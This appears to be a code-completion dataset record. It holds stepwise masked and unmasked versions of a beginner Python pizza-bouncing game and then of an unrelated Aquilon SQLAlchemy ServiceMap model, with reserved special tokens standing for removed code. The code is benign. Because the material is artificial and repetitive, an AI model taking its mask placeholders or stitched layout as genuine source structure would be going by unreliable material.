screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pan = Pan(image=pan_img, x=games.mouse.x, y=games.mouse.y)
score = ScText(value=SCORE, size=60, is_collideable=False, color=color.
black, x=550, y=30)
games.screen.add(pizza)
games.screen.add(pizza2)
games.screen.add(pizza3)
games.screen.add(pizza4)
games.screen.add(score)
games.screen.add(pan)
games.mouse.is_visible = False
games.screen.event_grab = False
games.screen.mainloop()
games.screen.add(score)
main()
<|reserved_special_token_1|>
from superwires import games, color
import random
SCORE = 0
## pizza_image= games.load_image("images/pizza.png")
## pizza = games.Sprite(image = pizza_image, x=SW/2, y=SH/2,
## dx =1, dy = 1)
## games.screen.add(pizza)
games.init(screen_width = 640, screen_height = 480, fps = 50)
class Pan(games.Sprite):
""" A pan controlled by the mouse. """
def update(self):
""" Move to mouse coordinates """
self.x = games.mouse.x
#self.y = games.mouse.y
self.check_collide()
def check_collide(self):
""" Check for collision with pizza. """
for pizza in self.overlapping_sprites:
pizza.handle_collide()
class Pizza(games.Sprite):
def update(self):
global SCORE
#bouncing
if self.right > games.screen.width or self.left < 0:
self.dx = -self.dx
#SCORE += 1
#if self.bottom > games.screen.height or
if self.top < 0:
self.dy = -self.dy
#SCORE += 1
## if self.left > games.screen.width:
## self.right = 0
## SCORE +=1
## if self.right<0:
## self.left = games.screen.width
## SCORE +=1
##
## if self.top > games.screen.height:
## self.top = 0
## SCORE +=1
## if self.bottom < 0:
## self.bottom = games.screen.height
## SCORE +=1
##
def handle_collide(self):
#self.x = random.randrange(games.screen.width)
self.dy = -self.dy
class ScText(games.Text):
def update(self):
self.value = SCORE
def main():
# loaded img
bg_img = games.load_image("images/pizzeria.jpg", transparent = True)
pizza_img = games.load_image("images/pizza.png")
pan_img = games.load_image("images/mousepoint.png")
#added img to bg
games.screen.background = bg_img
#create pizza obj
pizza = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,
dx =random.randint(-10,10), dy = random.randint(-10,10))
pizza2 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,
dx =random.randint(-10,10), dy = random.randint(-10,10))
pizza3 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,
dx =random.randint(-10,10), dy = random.randint(-10,10))
pizza4 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,
dx =random.randint(-10,10), dy = random.randint(-10,10))
#create pan obj
pan = Pan(image = pan_img, x=games.mouse.x, y=games.mouse.y)
#create txt obj
score = ScText(value = SCORE, size = 60,
is_collideable = False,
color = color.black,
x = 550,
y = 30)
#draw objs to screen
games.screen.add(pizza)
games.screen.add(pizza2)
games.screen.add(pizza3)
games.screen.add(pizza4)
games.screen.add(score)
games.screen.add(pan)
#sets visibility of mouse while on screen
games.mouse.is_visible = False
#locks mouse to screen if True
games.screen.event_grab = False
#start mainloop
games.screen.mainloop()
#score = games.Text(value = "welcome", size = 60, color = color.black, x = 550, y = 30)
games.screen.add(score)
#### won_message = games.Message(value = "You lose!", color = color.blue, size = 100, x = games.screen.width/2, y = games.screen.height/2, lifetime = 250, after_death = games.screen.quit)
#### games.screen.add(won_message)
##game_over = games.Message(value = "Game Over",
## size = 100,
## color = color.blue,
## x = games.screen.width/2
## y = games.screen.height/2
## lifetime = 250,
## after_death = games.screen.quit)
##games.screen.add(game_over)
main()
##angle - Facing in degrees
##
##x - x-coordinate
##
##y - y-coordinate
##
##dx - x velocity
##
##dy - y velocity
##
##left - x-coordinate of left sprite edge
##
##right - x-coordinate of right sprite edge
##
##top - y-coordinate of top sprite edge
##
##bottom - y-coordinate of bottom sprite edge
##
##image - image object of sprite
##
##overlapping_sprites - List of other objects that overlap sprite
##
##is_collideable - Whether or not the sprite is collideable. True means sprite will register in collisions. False means sprite will not show up in collisions.
##Methods
##
##update() - Updates sprite. Automatically called every mainloop() cycle.
##
##destroy() - Removes sprite from the screen
|
flexible
|
{
"blob_id": "ee16b91ce1c12ce78d23ff655304aebc39cb1639",
"index": 9693,
"step-1": "<mask token>\n\n\nclass Pan(games.Sprite):\n <mask token>\n\n def update(self):\n \"\"\" Move to mouse coordinates \"\"\"\n self.x = games.mouse.x\n self.check_collide()\n <mask token>\n\n\nclass Pizza(games.Sprite):\n\n def update(self):\n global SCORE\n if self.right > games.screen.width or self.left < 0:\n self.dx = -self.dx\n if self.top < 0:\n self.dy = -self.dy\n\n def handle_collide(self):\n self.dy = -self.dy\n\n\nclass ScText(games.Text):\n\n def update(self):\n self.value = SCORE\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Pan(games.Sprite):\n \"\"\" A pan controlled by the mouse. \"\"\"\n\n def update(self):\n \"\"\" Move to mouse coordinates \"\"\"\n self.x = games.mouse.x\n self.check_collide()\n\n def check_collide(self):\n \"\"\" Check for collision with pizza. \"\"\"\n for pizza in self.overlapping_sprites:\n pizza.handle_collide()\n\n\nclass Pizza(games.Sprite):\n\n def update(self):\n global SCORE\n if self.right > games.screen.width or self.left < 0:\n self.dx = -self.dx\n if self.top < 0:\n self.dy = -self.dy\n\n def handle_collide(self):\n self.dy = -self.dy\n\n\nclass ScText(games.Text):\n\n def update(self):\n self.value = SCORE\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Pan(games.Sprite):\n \"\"\" A pan controlled by the mouse. \"\"\"\n\n def update(self):\n \"\"\" Move to mouse coordinates \"\"\"\n self.x = games.mouse.x\n self.check_collide()\n\n def check_collide(self):\n \"\"\" Check for collision with pizza. \"\"\"\n for pizza in self.overlapping_sprites:\n pizza.handle_collide()\n\n\nclass Pizza(games.Sprite):\n\n def update(self):\n global SCORE\n if self.right > games.screen.width or self.left < 0:\n self.dx = -self.dx\n if self.top < 0:\n self.dy = -self.dy\n\n def handle_collide(self):\n self.dy = -self.dy\n\n\nclass ScText(games.Text):\n\n def update(self):\n self.value = SCORE\n\n\ndef main():\n bg_img = games.load_image('images/pizzeria.jpg', transparent=True)\n pizza_img = games.load_image('images/pizza.png')\n pan_img = games.load_image('images/mousepoint.png')\n games.screen.background = bg_img\n pizza = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.screen\n .height / 2, dx=random.randint(-10, 10), dy=random.randint(-10, 10))\n pizza2 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pizza3 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pizza4 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pan = Pan(image=pan_img, x=games.mouse.x, y=games.mouse.y)\n score = ScText(value=SCORE, size=60, is_collideable=False, color=color.\n black, x=550, y=30)\n games.screen.add(pizza)\n games.screen.add(pizza2)\n games.screen.add(pizza3)\n games.screen.add(pizza4)\n games.screen.add(score)\n games.screen.add(pan)\n games.mouse.is_visible = False\n games.screen.event_grab = False\n games.screen.mainloop()\n games.screen.add(score)\n\n\n<mask token>\n",
"step-4": "from superwires import games, color\nimport random\nSCORE = 0\ngames.init(screen_width=640, screen_height=480, fps=50)\n\n\nclass Pan(games.Sprite):\n \"\"\" A pan controlled by the mouse. \"\"\"\n\n def update(self):\n \"\"\" Move to mouse coordinates \"\"\"\n self.x = games.mouse.x\n self.check_collide()\n\n def check_collide(self):\n \"\"\" Check for collision with pizza. \"\"\"\n for pizza in self.overlapping_sprites:\n pizza.handle_collide()\n\n\nclass Pizza(games.Sprite):\n\n def update(self):\n global SCORE\n if self.right > games.screen.width or self.left < 0:\n self.dx = -self.dx\n if self.top < 0:\n self.dy = -self.dy\n\n def handle_collide(self):\n self.dy = -self.dy\n\n\nclass ScText(games.Text):\n\n def update(self):\n self.value = SCORE\n\n\ndef main():\n bg_img = games.load_image('images/pizzeria.jpg', transparent=True)\n pizza_img = games.load_image('images/pizza.png')\n pan_img = games.load_image('images/mousepoint.png')\n games.screen.background = bg_img\n pizza = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.screen\n .height / 2, dx=random.randint(-10, 10), dy=random.randint(-10, 10))\n pizza2 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pizza3 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pizza4 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.\n screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-\n 10, 10))\n pan = Pan(image=pan_img, x=games.mouse.x, y=games.mouse.y)\n score = ScText(value=SCORE, size=60, is_collideable=False, color=color.\n black, x=550, y=30)\n games.screen.add(pizza)\n games.screen.add(pizza2)\n games.screen.add(pizza3)\n games.screen.add(pizza4)\n games.screen.add(score)\n games.screen.add(pan)\n games.mouse.is_visible = False\n games.screen.event_grab = False\n games.screen.mainloop()\n games.screen.add(score)\n\n\nmain()\n",
"step-5": "from superwires import games, color\nimport random\n\nSCORE = 0\n\n\n\n\n \n## pizza_image= games.load_image(\"images/pizza.png\")\n## pizza = games.Sprite(image = pizza_image, x=SW/2, y=SH/2,\n## dx =1, dy = 1)\n## games.screen.add(pizza)\n\ngames.init(screen_width = 640, screen_height = 480, fps = 50)\n\nclass Pan(games.Sprite):\n \"\"\" A pan controlled by the mouse. \"\"\"\n def update(self):\n \"\"\" Move to mouse coordinates \"\"\"\n self.x = games.mouse.x\n #self.y = games.mouse.y\n self.check_collide()\n def check_collide(self):\n \"\"\" Check for collision with pizza. \"\"\"\n for pizza in self.overlapping_sprites:\n pizza.handle_collide()\n \n \nclass Pizza(games.Sprite):\n\n def update(self):\n global SCORE\n #bouncing \n if self.right > games.screen.width or self.left < 0:\n self.dx = -self.dx\n #SCORE += 1\n\n #if self.bottom > games.screen.height or\n if self.top < 0:\n self.dy = -self.dy\n #SCORE += 1\n \n## if self.left > games.screen.width:\n## self.right = 0\n## SCORE +=1\n## if self.right<0:\n## self.left = games.screen.width\n## SCORE +=1\n##\n## if self.top > games.screen.height:\n## self.top = 0\n## SCORE +=1\n## if self.bottom < 0:\n## self.bottom = games.screen.height\n## SCORE +=1\n## \n def handle_collide(self):\n #self.x = random.randrange(games.screen.width)\n self.dy = -self.dy\n \n\n\nclass ScText(games.Text):\n def update(self):\n self.value = SCORE\n\ndef main():\n # loaded img\n bg_img = games.load_image(\"images/pizzeria.jpg\", transparent = True)\n pizza_img = games.load_image(\"images/pizza.png\")\n pan_img = games.load_image(\"images/mousepoint.png\")\n\n #added img to bg\n games.screen.background = bg_img\n\n #create pizza obj\n pizza = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,\n dx =random.randint(-10,10), dy = random.randint(-10,10))\n pizza2 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,\n dx =random.randint(-10,10), dy = random.randint(-10,10))\n pizza3 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,\n dx =random.randint(-10,10), dy = random.randint(-10,10))\n pizza4 = Pizza(image = pizza_img, x=games.screen.width/2, y=games.screen.height/2,\n dx =random.randint(-10,10), dy = random.randint(-10,10))\n\n #create pan obj\n pan = Pan(image = pan_img, x=games.mouse.x, y=games.mouse.y)\n \n \n \n \n \n\n #create txt obj\n score = ScText(value = SCORE, size = 60,\n is_collideable = False,\n color = color.black,\n x = 550,\n y = 30)\n\n #draw objs to screen\n games.screen.add(pizza)\n games.screen.add(pizza2)\n games.screen.add(pizza3)\n games.screen.add(pizza4)\n games.screen.add(score)\n games.screen.add(pan)\n \n #sets visibility of mouse while on screen\n games.mouse.is_visible = False\n\n #locks mouse to screen if True\n games.screen.event_grab = False\n\n\n #start mainloop\n games.screen.mainloop()\n\n\n #score = games.Text(value = \"welcome\", size = 60, color = color.black, x = 550, y = 30)\n games.screen.add(score)\n\n#### won_message = games.Message(value = \"You lose!\", color = color.blue, size = 100, x = games.screen.width/2, y = games.screen.height/2, lifetime = 250, after_death = games.screen.quit)\n#### games.screen.add(won_message)\n\n##game_over = games.Message(value = \"Game Over\",\n## size = 100,\n## color = color.blue,\n## x = games.screen.width/2\n## y = games.screen.height/2\n## lifetime = 250,\n## after_death = games.screen.quit)\n##games.screen.add(game_over)\n\nmain()\n\n\n\n\n\n##angle - Facing in degrees\n##\n##x - x-coordinate\n##\n##y - y-coordinate\n##\n##dx - x velocity\n##\n##dy - y velocity\n##\n##left - x-coordinate of left sprite edge\n##\n##right - x-coordinate of right sprite edge\n##\n##top - y-coordinate of top sprite edge\n##\n##bottom - y-coordinate of bottom sprite edge\n##\n##image - image object of sprite\n##\n##overlapping_sprites - List of other objects that overlap sprite\n##\n##is_collideable - Whether or not the sprite is collideable. True means sprite will register in collisions. False means sprite will not show up in collisions.\n\n##Methods\n##\n##update() - Updates sprite. Automatically called every mainloop() cycle.\n##\n##destroy() - Removes sprite from the screen\n",
"step-ids": [
7,
9,
10,
13,
14
]
}
|
[
7,
9,
10,
13,
14
] |
<|reserved_special_token_0|>
class ServiceMap(Base):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@property
def service(self):
return self.service_instance.service
@property
def scope_priority(self):
if self.network:
return _NETWORK_PRIORITY
else:
try:
return _LOCATION_PRIORITY[type(self.location)]
except KeyError:
raise InternalError(
'The service map is not prepared to handle location class %r'
% type(self.location))
@property
def object_priority(self):
if self.personality:
return _TARGET_PERSONALITY
elif self.host_environment:
return _TARGET_ENVIRONMENT
else:
return _TARGET_GLOBAL
@property
def priority(self):
return self.object_priority, self.scope_priority
@property
def scope(self):
if self.location:
return self.location
else:
return self.network
def __init__(self, service_instance, network=None, location=None,
personality=None, host_environment=None):
if network and location:
raise AquilonError(
"A service can't be mapped to a Network and a Location at the same time"
)
if network is None and location is None:
raise AquilonError(
'A service should by mapped to a Network or a Location')
if personality and host_environment:
raise AquilonError(
"A service can't be mapped to a Personality and a HostEnvironment at the same time"
)
super(ServiceMap, self).__init__(service_instance=service_instance,
network=network, location=location, personality=personality,
host_environment=host_environment)
@staticmethod
def get_location_mapped_instances(dbservice, dblocation):
session = object_session(dbservice)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
q = session.query(ServiceMap)
q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.
host_environment_id == null()))
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.join(ServiceInstance)
q = q.filter_by(service=dbservice)
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), lazyload('service_instance.service'))
instances = []
min_seen_priority = maxsize,
for map in q:
si = map.service_instance
if min_seen_priority > map.priority:
instances = [si]
min_seen_priority = map.priority
elif min_seen_priority == map.priority:
instances.append(si)
return instances
@staticmethod
def get_mapped_instance_cache(dbservices, dbstage, dblocation,
dbnetwork=None):
"""Returns dict of requested services to closest mapped instances."""
session = object_session(dblocation)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
PSLI = PersonalityServiceListItem
q = session.query(ServiceMap)
q = q.join(ServiceInstance)
q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in
dbservices))
q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,
PSLI.service_id == ServiceInstance.service_id))
q = q.filter(or_(and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()), ServiceMap.
personality == dbstage.personality, ServiceMap.
host_environment_id == coalesce(PSLI.host_environment_id,
dbstage.personality.host_environment.id)))
if dbnetwork:
q = q.filter(or_(ServiceMap.location_id.in_(location_ids),
ServiceMap.network_id == dbnetwork.id))
else:
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), undefer(
'service_instance._client_count'), lazyload(
'service_instance.service'))
instance_cache = {}
instance_priority = defaultdict(lambda : (maxsize,))
for map in q:
si = map.service_instance
service = si.service
if instance_priority[service] > map.priority:
instance_cache[service] = [si]
instance_priority[service] = map.priority
elif instance_priority[service] == map.priority:
instance_cache[service].append(si)
return instance_cache
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ServiceMap(Base):
<|reserved_special_token_0|>
__tablename__ = _TN
id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)
service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=
'CASCADE'), nullable=False)
personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),
nullable=True, index=True)
host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)
location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),
nullable=True, index=True)
network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),
nullable=True, index=True)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
service_instance = relation(ServiceInstance, innerjoin=True, backref=
backref('service_map', cascade='all, delete-orphan',
passive_deletes=True))
personality = relation(Personality)
host_environment = relation(HostEnvironment)
location = relation(Location)
network = relation(Network)
__table_args__ = UniqueConstraint(service_instance_id, personality_id,
host_environment_id, location_id, network_id, name='%s_uk' % _TN
), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +
case([(host_environment_id != null(), 1)], else_=0) <= 1, name=
'%s_target_ck' % _TN)
@property
def service(self):
return self.service_instance.service
@property
def scope_priority(self):
if self.network:
return _NETWORK_PRIORITY
else:
try:
return _LOCATION_PRIORITY[type(self.location)]
except KeyError:
raise InternalError(
'The service map is not prepared to handle location class %r'
% type(self.location))
@property
def object_priority(self):
if self.personality:
return _TARGET_PERSONALITY
elif self.host_environment:
return _TARGET_ENVIRONMENT
else:
return _TARGET_GLOBAL
@property
def priority(self):
return self.object_priority, self.scope_priority
@property
def scope(self):
if self.location:
return self.location
else:
return self.network
def __init__(self, service_instance, network=None, location=None,
personality=None, host_environment=None):
if network and location:
raise AquilonError(
"A service can't be mapped to a Network and a Location at the same time"
)
if network is None and location is None:
raise AquilonError(
'A service should by mapped to a Network or a Location')
if personality and host_environment:
raise AquilonError(
"A service can't be mapped to a Personality and a HostEnvironment at the same time"
)
super(ServiceMap, self).__init__(service_instance=service_instance,
network=network, location=location, personality=personality,
host_environment=host_environment)
@staticmethod
def get_location_mapped_instances(dbservice, dblocation):
session = object_session(dbservice)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
q = session.query(ServiceMap)
q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.
host_environment_id == null()))
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.join(ServiceInstance)
q = q.filter_by(service=dbservice)
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), lazyload('service_instance.service'))
instances = []
min_seen_priority = maxsize,
for map in q:
si = map.service_instance
if min_seen_priority > map.priority:
instances = [si]
min_seen_priority = map.priority
elif min_seen_priority == map.priority:
instances.append(si)
return instances
@staticmethod
def get_mapped_instance_cache(dbservices, dbstage, dblocation,
dbnetwork=None):
"""Returns dict of requested services to closest mapped instances."""
session = object_session(dblocation)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
PSLI = PersonalityServiceListItem
q = session.query(ServiceMap)
q = q.join(ServiceInstance)
q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in
dbservices))
q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,
PSLI.service_id == ServiceInstance.service_id))
q = q.filter(or_(and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()), ServiceMap.
personality == dbstage.personality, ServiceMap.
host_environment_id == coalesce(PSLI.host_environment_id,
dbstage.personality.host_environment.id)))
if dbnetwork:
q = q.filter(or_(ServiceMap.location_id.in_(location_ids),
ServiceMap.network_id == dbnetwork.id))
else:
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), undefer(
'service_instance._client_count'), lazyload(
'service_instance.service'))
instance_cache = {}
instance_priority = defaultdict(lambda : (maxsize,))
for map in q:
si = map.service_instance
service = si.service
if instance_priority[service] > map.priority:
instance_cache[service] = [si]
instance_priority[service] = map.priority
elif instance_priority[service] == map.priority:
instance_cache[service].append(si)
return instance_cache
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ServiceMap(Base):
""" Service Map: mapping a service_instance to a location.
The rows in this table assert that an instance is a valid useable
default that clients can choose as their provider during service
autoconfiguration.
The contained information is actually a triplet:
- The service instance to use,
- Rules for the scope where the map is valid,
- Rules for which objects does the map apply.
"""
__tablename__ = _TN
id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)
service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=
'CASCADE'), nullable=False)
personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),
nullable=True, index=True)
host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)
location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),
nullable=True, index=True)
network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),
nullable=True, index=True)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
service_instance = relation(ServiceInstance, innerjoin=True, backref=
backref('service_map', cascade='all, delete-orphan',
passive_deletes=True))
personality = relation(Personality)
host_environment = relation(HostEnvironment)
location = relation(Location)
network = relation(Network)
__table_args__ = UniqueConstraint(service_instance_id, personality_id,
host_environment_id, location_id, network_id, name='%s_uk' % _TN
), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +
case([(host_environment_id != null(), 1)], else_=0) <= 1, name=
'%s_target_ck' % _TN)
@property
def service(self):
return self.service_instance.service
@property
def scope_priority(self):
if self.network:
return _NETWORK_PRIORITY
else:
try:
return _LOCATION_PRIORITY[type(self.location)]
except KeyError:
raise InternalError(
'The service map is not prepared to handle location class %r'
% type(self.location))
@property
def object_priority(self):
if self.personality:
return _TARGET_PERSONALITY
elif self.host_environment:
return _TARGET_ENVIRONMENT
else:
return _TARGET_GLOBAL
@property
def priority(self):
return self.object_priority, self.scope_priority
@property
def scope(self):
if self.location:
return self.location
else:
return self.network
def __init__(self, service_instance, network=None, location=None,
personality=None, host_environment=None):
if network and location:
raise AquilonError(
"A service can't be mapped to a Network and a Location at the same time"
)
if network is None and location is None:
raise AquilonError(
'A service should by mapped to a Network or a Location')
if personality and host_environment:
raise AquilonError(
"A service can't be mapped to a Personality and a HostEnvironment at the same time"
)
super(ServiceMap, self).__init__(service_instance=service_instance,
network=network, location=location, personality=personality,
host_environment=host_environment)
@staticmethod
def get_location_mapped_instances(dbservice, dblocation):
session = object_session(dbservice)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
q = session.query(ServiceMap)
q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.
host_environment_id == null()))
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.join(ServiceInstance)
q = q.filter_by(service=dbservice)
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), lazyload('service_instance.service'))
instances = []
min_seen_priority = maxsize,
for map in q:
si = map.service_instance
if min_seen_priority > map.priority:
instances = [si]
min_seen_priority = map.priority
elif min_seen_priority == map.priority:
instances.append(si)
return instances
@staticmethod
def get_mapped_instance_cache(dbservices, dbstage, dblocation,
dbnetwork=None):
"""Returns dict of requested services to closest mapped instances."""
session = object_session(dblocation)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
PSLI = PersonalityServiceListItem
q = session.query(ServiceMap)
q = q.join(ServiceInstance)
q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in
dbservices))
q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,
PSLI.service_id == ServiceInstance.service_id))
q = q.filter(or_(and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()), ServiceMap.
personality == dbstage.personality, ServiceMap.
host_environment_id == coalesce(PSLI.host_environment_id,
dbstage.personality.host_environment.id)))
if dbnetwork:
q = q.filter(or_(ServiceMap.location_id.in_(location_ids),
ServiceMap.network_id == dbnetwork.id))
else:
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), undefer(
'service_instance._client_count'), lazyload(
'service_instance.service'))
instance_cache = {}
instance_priority = defaultdict(lambda : (maxsize,))
for map in q:
si = map.service_instance
service = si.service
if instance_priority[service] > map.priority:
instance_cache[service] = [si]
instance_priority[service] = map.priority
elif instance_priority[service] == map.priority:
instance_cache[service].append(si)
return instance_cache
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from collections import defaultdict
from datetime import datetime
from sys import maxsize
from sqlalchemy import Column, Integer, Sequence, DateTime, ForeignKey, UniqueConstraint, CheckConstraint
from sqlalchemy.orm import relation, deferred, backref, defer, undefer, lazyload, contains_eager, object_session
from sqlalchemy.sql import and_, or_, null, case
from sqlalchemy.sql.functions import coalesce
from aquilon.exceptions_ import InternalError, AquilonError
from aquilon.aqdb.model import Base, Location, Desk, Rack, Room, Bunker, Building, City, Campus, Country, Continent, Hub, Organization, ServiceInstance, Network, Personality, PersonalityServiceListItem, HostEnvironment
_TN = 'service_map'
_LOCATION_PRIORITY = {Rack: 1000, Desk: 1000, Room: 1100, Bunker: 1200,
Building: 1300, City: 1400, Campus: 1500, Country: 1600, Continent:
1700, Hub: 1800, Organization: 1900}
_NETWORK_PRIORITY = 100
_TARGET_PERSONALITY = 10
_TARGET_ENVIRONMENT = 100
_TARGET_GLOBAL = 1000
class ServiceMap(Base):
""" Service Map: mapping a service_instance to a location.
The rows in this table assert that an instance is a valid useable
default that clients can choose as their provider during service
autoconfiguration.
The contained information is actually a triplet:
- The service instance to use,
- Rules for the scope where the map is valid,
- Rules for which objects does the map apply.
"""
__tablename__ = _TN
id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)
service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=
'CASCADE'), nullable=False)
personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),
nullable=True, index=True)
host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)
location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),
nullable=True, index=True)
network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),
nullable=True, index=True)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
service_instance = relation(ServiceInstance, innerjoin=True, backref=
backref('service_map', cascade='all, delete-orphan',
passive_deletes=True))
personality = relation(Personality)
host_environment = relation(HostEnvironment)
location = relation(Location)
network = relation(Network)
__table_args__ = UniqueConstraint(service_instance_id, personality_id,
host_environment_id, location_id, network_id, name='%s_uk' % _TN
), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +
case([(host_environment_id != null(), 1)], else_=0) <= 1, name=
'%s_target_ck' % _TN)
@property
def service(self):
return self.service_instance.service
@property
def scope_priority(self):
if self.network:
return _NETWORK_PRIORITY
else:
try:
return _LOCATION_PRIORITY[type(self.location)]
except KeyError:
raise InternalError(
'The service map is not prepared to handle location class %r'
% type(self.location))
@property
def object_priority(self):
if self.personality:
return _TARGET_PERSONALITY
elif self.host_environment:
return _TARGET_ENVIRONMENT
else:
return _TARGET_GLOBAL
@property
def priority(self):
return self.object_priority, self.scope_priority
@property
def scope(self):
if self.location:
return self.location
else:
return self.network
def __init__(self, service_instance, network=None, location=None,
personality=None, host_environment=None):
if network and location:
raise AquilonError(
"A service can't be mapped to a Network and a Location at the same time"
)
if network is None and location is None:
raise AquilonError(
'A service should by mapped to a Network or a Location')
if personality and host_environment:
raise AquilonError(
"A service can't be mapped to a Personality and a HostEnvironment at the same time"
)
super(ServiceMap, self).__init__(service_instance=service_instance,
network=network, location=location, personality=personality,
host_environment=host_environment)
@staticmethod
def get_location_mapped_instances(dbservice, dblocation):
session = object_session(dbservice)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
q = session.query(ServiceMap)
q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.
host_environment_id == null()))
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.join(ServiceInstance)
q = q.filter_by(service=dbservice)
q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), lazyload('service_instance.service'))
instances = []
min_seen_priority = maxsize,
for map in q:
si = map.service_instance
if min_seen_priority > map.priority:
instances = [si]
min_seen_priority = map.priority
elif min_seen_priority == map.priority:
instances.append(si)
return instances
@staticmethod
def get_mapped_instance_cache(dbservices, dbstage, dblocation,
dbnetwork=None):
"""Returns dict of requested services to closest mapped instances."""
session = object_session(dblocation)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
PSLI = PersonalityServiceListItem
q = session.query(ServiceMap)
q = q.join(ServiceInstance)
q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in
dbservices))
q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,
PSLI.service_id == ServiceInstance.service_id))
q = q.filter(or_(and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()), ServiceMap.
personality == dbstage.personality, ServiceMap.
host_environment_id == coalesce(PSLI.host_environment_id,
dbstage.personality.host_environment.id)))
if dbnetwork:
q = q.filter(or_(ServiceMap.location_id.in_(location_ids),
ServiceMap.network_id == dbnetwork.id))
else:
q = q.filter(ServiceMap.location_id.in_(location_ids))
